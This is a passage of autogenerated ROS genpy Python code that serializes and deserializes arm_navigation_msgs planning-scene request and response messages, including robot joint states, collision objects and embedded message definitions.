buff.write(_struct_I.pack(length))
for val3 in _v76.poses:
_v80 = val3.position
_x = _v80
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v81 = val3.orientation
_x = _v81
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.touch_links)
buff.write(_struct_I.pack(length))
for val2 in val1.touch_links:
length = len(val2)
if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.pack('<I%ss'%length, length, val2))
_x = self
buff.write(_struct_3I.pack(_x.planning_scene_diff.collision_map.header.seq, _x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs))
_x = self.planning_scene_diff.collision_map.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.planning_scene_diff.collision_map.boxes)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.collision_map.boxes:
_v82 = val1.center
_x = _v82
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
_v83 = val1.extents
_x = _v83
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
_v84 = val1.axis
_x = _v84
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
buff.write(_struct_f.pack(val1.angle))
length = len(self.operations.collision_operations)
buff.write(_struct_I.pack(length))
for val1 in self.operations.collision_operations:
_x = val1.object1
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.object2
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1
buff.write(_struct_di.pack(_x.penetration_distance, _x.operation))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.planning_scene_diff is None:
self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()
if self.operations is None:
self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()
end = 0
_x = self
start = end
end += 12
(_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.joint_state.name = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.joint_state.name.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene_diff.robot_state.joint_state.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene_diff.robot_state.joint_state.velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene_diff.robot_state.joint_state.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_x = self
start = end
end += 8
(_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v85 = val1.position
_x = _v85
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v86 = val1.orientation
_x = _v86
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.poses.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.fixed_frame_transforms = []
for i in range(0, length):
val1 = geometry_msgs.msg.TransformStamped()
_v87 = val1.header
start = end
end += 4
(_v87.seq,) = _struct_I.unpack(str[start:end])
_v88 = _v87.stamp
_x = _v88
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v87.frame_id = str[start:end].decode('utf-8')
else:
_v87.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.child_frame_id = str[start:end].decode('utf-8')
else:
val1.child_frame_id = str[start:end]
_v89 = val1.transform
_v90 = _v89.translation
_x = _v90
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v91 = _v89.rotation
_x = _v91
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene_diff.fixed_frame_transforms.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.allowed_collision_matrix.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.allowed_collision_matrix.link_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.allowed_collision_matrix.entries = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedCollisionEntry()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sB'%length
start = end
end += struct.calcsize(pattern)
val1.enabled = numpy.frombuffer(str[start:end], dtype=numpy.bool, count=length)
val1.enabled = map(bool, val1.enabled)
self.planning_scene_diff.allowed_collision_matrix.entries.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.allowed_contacts = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedContactSpecification()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8')
else:
val1.name = str[start:end]
_v92 = val1.shape
start = end
end += 1
(_v92.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
_v92.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
_v92.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v92.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v92.vertices.append(val3)
_v93 = val1.pose_stamped
_v94 = _v93.header
start = end
end += 4
(_v94.seq,) = _struct_I.unpack(str[start:end])
_v95 = _v94.stamp
_x = _v95
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v94.frame_id = str[start:end].decode('utf-8')
else:
_v94.frame_id = str[start:end]
_v96 = _v93.pose
_v97 = _v96.position
_x = _v97
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v98 = _v96.orientation
_x = _v98
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.link_names.append(val2)
start = end
end += 8
(val1.penetration_depth,) = _struct_d.unpack(str[start:end])
self.planning_scene_diff.allowed_contacts.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.link_padding = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.LinkPadding()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
start = end
end += 8
(val1.padding,) = _struct_d.unpack(str[start:end])
self.planning_scene_diff.link_padding.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.CollisionObject()
_v99 = val1.header
start = end
end += 4
(_v99.seq,) = _struct_I.unpack(str[start:end])
_v100 = _v99.stamp
_x = _v100
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v99.frame_id = str[start:end].decode('utf-8')
else:
_v99.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.id = str[start:end].decode('utf-8')
else:
val1.id = str[start:end]
start = end
end += 4
(val1.padding,) = _struct_f.unpack(str[start:end])
_v101 = val1.operation
start = end
end += 1
(_v101.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.shapes = []
for i in range(0, length):
val2 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val2.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val2.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val2.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val2.vertices.append(val3)
val1.shapes.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v102 = val2.position
_x = _v102
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v103 = val2.orientation
_x = _v103
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
val1.poses.append(val2)
self.planning_scene_diff.collision_objects.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.attached_collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AttachedCollisionObject()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
_v104 = val1.object
_v105 = _v104.header
start = end
end += 4
(_v105.seq,) = _struct_I.unpack(str[start:end])
_v106 = _v105.stamp
_x = _v106
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v105.frame_id = str[start:end].decode('utf-8')
else:
_v105.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v104.id = str[start:end].decode('utf-8')
else:
_v104.id = str[start:end]
start = end
end += 4
(_v104.padding,) = _struct_f.unpack(str[start:end])
_v107 = _v104.operation
start = end
end += 1
(_v107.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v104.shapes = []
for i in range(0, length):
val3 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val3.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val3.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.vertices = []
for i in range(0, length):
val4 = geometry_msgs.msg.Point()
_x = val4
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val3.vertices.append(val4)
_v104.shapes.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v104.poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v108 = val3.position
_x = _v108
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v109 = val3.orientation
_x = _v109
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
_v104.poses.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.touch_links = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.touch_links.append(val2)
self.planning_scene_diff.attached_collision_objects.append(val1)
_x = self
start = end
end += 12
(_x.planning_scene_diff.collision_map.header.seq, _x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene_diff.collision_map.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene_diff.collision_map.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.collision_map.boxes = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.OrientedBoundingBox()
_v110 = val1.center
_x = _v110
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v111 = val1.extents
_x = _v111
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v112 = val1.axis
_x = _v112
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
start = end
end += 4
(val1.angle,) = _struct_f.unpack(str[start:end])
self.planning_scene_diff.collision_map.boxes.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.operations.collision_operations = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.CollisionOperation()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.object1 = str[start:end].decode('utf-8')
else:
val1.object1 = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.object2 = str[start:end].decode('utf-8')
else:
val1.object2 = str[start:end]
_x = val1
start = end
end += 12
(_x.penetration_distance, _x.operation,) = _struct_di.unpack(str[start:end])
self.operations.collision_operations.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_b = struct.Struct("<b")
_struct_d = struct.Struct("<d")
_struct_f = struct.Struct("<f")
_struct_di = struct.Struct("<di")
_struct_3f = struct.Struct("<3f")
_struct_3I = struct.Struct("<3I")
_struct_4d = struct.Struct("<4d")
_struct_2I = struct.Struct("<2I")
_struct_3d = struct.Struct("<3d")
"""autogenerated by genpy from arm_navigation_msgs/GetPlanningSceneResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import arm_navigation_msgs.msg
import geometry_msgs.msg
import std_msgs.msg
import genpy
import sensor_msgs.msg
class GetPlanningSceneResponse(genpy.Message):
_md5sum = "285525c9abe002fbafa99af84a14b4cb"
_type = "arm_navigation_msgs/GetPlanningSceneResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """
PlanningScene planning_scene
================================================================================
MSG: arm_navigation_msgs/PlanningScene
#full robot state
arm_navigation_msgs/RobotState robot_state
#additional frames for duplicating tf
geometry_msgs/TransformStamped[] fixed_frame_transforms
#full allowed collision matrix
AllowedCollisionMatrix allowed_collision_matrix
#allowed contacts
arm_navigation_msgs/AllowedContactSpecification[] allowed_contacts
#all link paddings
arm_navigation_msgs/LinkPadding[] link_padding
#collision objects
arm_navigation_msgs/CollisionObject[] collision_objects
arm_navigation_msgs/AttachedCollisionObject[] attached_collision_objects
#the collision map
arm_navigation_msgs/CollisionMap collision_map
================================================================================
MSG: arm_navigation_msgs/RobotState
# This message contains information about the robot state, i.e. the positions of its joints and links
sensor_msgs/JointState joint_state
arm_navigation_msgs/MultiDOFJointState multi_dof_joint_state
================================================================================
MSG: sensor_msgs/JointState
# This is a message that holds data to describe the state of a set of torque controlled joints.
#
# The state of each joint (revolute or prismatic) is defined by:
# * the position of the joint (rad or m),
# * the velocity of the joint (rad/s or m/s) and
# * the effort that is applied in the joint (Nm or N).
#
# Each joint is uniquely identified by its name
# The header specifies the time at which the joint states were recorded. All the joint states
# in one message have to be recorded at the same time.
#
# This message consists of a multiple arrays, one for each part of the joint state.
# The goal is to make each of the fields optional. When e.g. your joints have no
# effort associated with them, you can leave the effort array empty.
#
# All arrays in this message should have the same size, or be empty.
# This is the only way to uniquely associate the joint name with the correct
# states.
Header header
string[] name
float64[] position
float64[] velocity
float64[] effort
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.secs: seconds (stamp_secs) since epoch
# * stamp.nsecs: nanoseconds since stamp_secs
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: arm_navigation_msgs/MultiDOFJointState
#A representation of a multi-dof joint state
time stamp
string[] joint_names
string[] frame_ids
string[] child_frame_ids
geometry_msgs/Pose[] poses
================================================================================
MSG: geometry_msgs/Pose
# A representation of pose in free space, composed of postion and orientation.
Point position
Quaternion orientation
================================================================================
MSG: geometry_msgs/Point
# This contains the position of a point in free space
float64 x
float64 y
float64 z
================================================================================
MSG: geometry_msgs/Quaternion
# This represents an orientation in free space in quaternion form.
float64 x
float64 y
float64 z
float64 w
================================================================================
MSG: geometry_msgs/TransformStamped
# This expresses a transform from coordinate frame header.frame_id
# to the coordinate frame child_frame_id
#
# This message is mostly used by the
# <a href="http://www.ros.org/wiki/tf">tf</a> package.
# See it's documentation for more information.
Header header
string child_frame_id # the frame id of the child frame
Transform transform
================================================================================
MSG: geometry_msgs/Transform
# This represents the transform between two coordinate frames in free space.
Vector3 translation
Quaternion rotation
================================================================================
MSG: geometry_msgs/Vector3
# This represents a vector in free space.
float64 x
float64 y
float64 z
================================================================================
MSG: arm_navigation_msgs/AllowedCollisionMatrix
# the list of link names in the matrix
string[] link_names
# the individual entries in the allowed collision matrix
# symmetric, with same order as link_names
AllowedCollisionEntry[] entries
================================================================================
MSG: arm_navigation_msgs/AllowedCollisionEntry
# whether or not collision checking is enabled
bool[] enabled
================================================================================
MSG: arm_navigation_msgs/AllowedContactSpecification
# The names of the regions
string name
# The shape of the region in the environment
arm_navigation_msgs/Shape shape
# The pose of the space defining the region
geometry_msgs/PoseStamped pose_stamped
# The set of links that will be allowed to have penetration contact within this region
string[] link_names
# The maximum penetration depth allowed for every link
float64 penetration_depth
================================================================================
MSG: arm_navigation_msgs/Shape
byte SPHERE=0
byte BOX=1
byte CYLINDER=2
byte MESH=3
byte type
#### define sphere, box, cylinder ####
# the origin of each shape is considered at the shape's center
# for sphere
# radius := dimensions[0]
# for cylinder
# radius := dimensions[0]
# length := dimensions[1]
# the length is along the Z axis
# for box
# size_x := dimensions[0]
# size_y := dimensions[1]
# size_z := dimensions[2]
float64[] dimensions
#### define mesh ####
# list of triangles; triangle k is defined by tre vertices located
# at indices triangles[3k], triangles[3k+1], triangles[3k+2]
int32[] triangles
geometry_msgs/Point[] vertices
================================================================================
MSG: geometry_msgs/PoseStamped
# A Pose with reference coordinate frame and timestamp
Header header
Pose pose
================================================================================
MSG: arm_navigation_msgs/LinkPadding
#name for the link
string link_name
# padding to apply to the link
float64 padding
================================================================================
MSG: arm_navigation_msgs/CollisionObject
# a header, used for interpreting the poses
Header header
# the id of the object
string id
# The padding used for filtering points near the object.
# This does not affect collision checking for the object.
# Set to negative to get zero padding.
float32 padding
#This contains what is to be done with the object
CollisionObjectOperation operation
#the shapes associated with the object
arm_navigation_msgs/Shape[] shapes
#the poses associated with the shapes - will be transformed using the header
geometry_msgs/Pose[] poses
================================================================================
MSG: arm_navigation_msgs/CollisionObjectOperation
#Puts the object into the environment
#or updates the object if already added
byte ADD=0
#Removes the object from the environment entirely
byte REMOVE=1
#Only valid within the context of a CollisionAttachedObject message
#Will be ignored if sent with an CollisionObject message
#Takes an attached object, detaches from the attached link
#But adds back in as regular object
byte DETACH_AND_ADD_AS_OBJECT=2
#Only valid within the context of a CollisionAttachedObject message
#Will be ignored if sent with an CollisionObject message
#Takes current object in the environment and removes it as
#a regular object
byte ATTACH_AND_REMOVE_AS_OBJECT=3
# Byte code for operation
byte operation
================================================================================
MSG: arm_navigation_msgs/AttachedCollisionObject
# The CollisionObject will be attached with a fixed joint to this link
# If link name is set to REMOVE_ALL_ATTACHED_OBJECTS and object.operation
# is set to REMOVE will remove all attached bodies attached to any object
string link_name
#Reserved for indicating that all attached objects should be removed
string REMOVE_ALL_ATTACHED_OBJECTS = "all"
#This contains the actual shapes and poses for the CollisionObject
#to be attached to the link
#If action is remove and no object.id is set, all objects
#attached to the link indicated by link_name will be removed
CollisionObject object
# The set of links that the attached objects are allowed to touch
# by default - the link_name is included by default
string[] touch_links
================================================================================
MSG: arm_navigation_msgs/CollisionMap
#header for interpreting box positions
Header header
#boxes for use in collision testing
OrientedBoundingBox[] boxes
================================================================================
MSG: arm_navigation_msgs/OrientedBoundingBox
#the center of the box
geometry_msgs/Point32 center
#the extents of the box, assuming the center is at the point
geometry_msgs/Point32 extents
#the axis of the box
geometry_msgs/Point32 axis
#the angle of rotation around the axis
float32 angle
================================================================================
MSG: geometry_msgs/Point32
# This contains the position of a point in free space(with 32 bits of precision).
# It is recommeded to use Point wherever possible instead of Point32.
#
# This recommendation is to promote interoperability.
#
# This message is designed to take up less space when sending
# lots of points at once, as in the case of a PointCloud.
float32 x
float32 y
float32 z
"""
__slots__ = ['planning_scene']
_slot_types = ['arm_navigation_msgs/PlanningScene']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
planning_scene
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(GetPlanningSceneResponse, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.planning_scene is None:
self.planning_scene = arm_navigation_msgs.msg.PlanningScene()
else:
self.planning_scene = arm_navigation_msgs.msg.PlanningScene()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_struct_3I.pack(_x.planning_scene.robot_state.joint_state.header.seq, _x.planning_scene.robot_state.joint_state.header.stamp.secs, _x.planning_scene.robot_state.joint_state.header.stamp.nsecs))
_x = self.planning_scene.robot_state.joint_state.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.planning_scene.robot_state.joint_state.name)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.joint_state.name:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.robot_state.joint_state.position)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *self.planning_scene.robot_state.joint_state.position))
length = len(self.planning_scene.robot_state.joint_state.velocity)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *self.planning_scene.robot_state.joint_state.velocity))
length = len(self.planning_scene.robot_state.joint_state.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *self.planning_scene.robot_state.joint_state.effort))
_x = self
buff.write(_struct_2I.pack(_x.planning_scene.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene.robot_state.multi_dof_joint_state.stamp.nsecs))
length = len(self.planning_scene.robot_state.multi_dof_joint_state.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.multi_dof_joint_state.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.robot_state.multi_dof_joint_state.frame_ids)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.multi_dof_joint_state.frame_ids:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.robot_state.multi_dof_joint_state.poses)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.multi_dof_joint_state.poses:
_v113 = val1.position
_x = _v113
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v114 = val1.orientation
_x = _v114
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene.fixed_frame_transforms)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.fixed_frame_transforms:
_v115 = val1.header
buff.write(_struct_I.pack(_v115.seq))
_v116 = _v115.stamp
_x = _v116
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v115.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.child_frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v117 = val1.transform
_v118 = _v117.translation
_x = _v118
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v119 = _v117.rotation
_x = _v119
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene.allowed_collision_matrix.link_names)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.allowed_collision_matrix.link_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.allowed_collision_matrix.entries)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.allowed_collision_matrix.entries:
length = len(val1.enabled)
buff.write(_struct_I.pack(length))
pattern = '<%sB'%length
buff.write(struct.pack(pattern, *val1.enabled))
length = len(self.planning_scene.allowed_contacts)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.allowed_contacts:
_x = val1.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
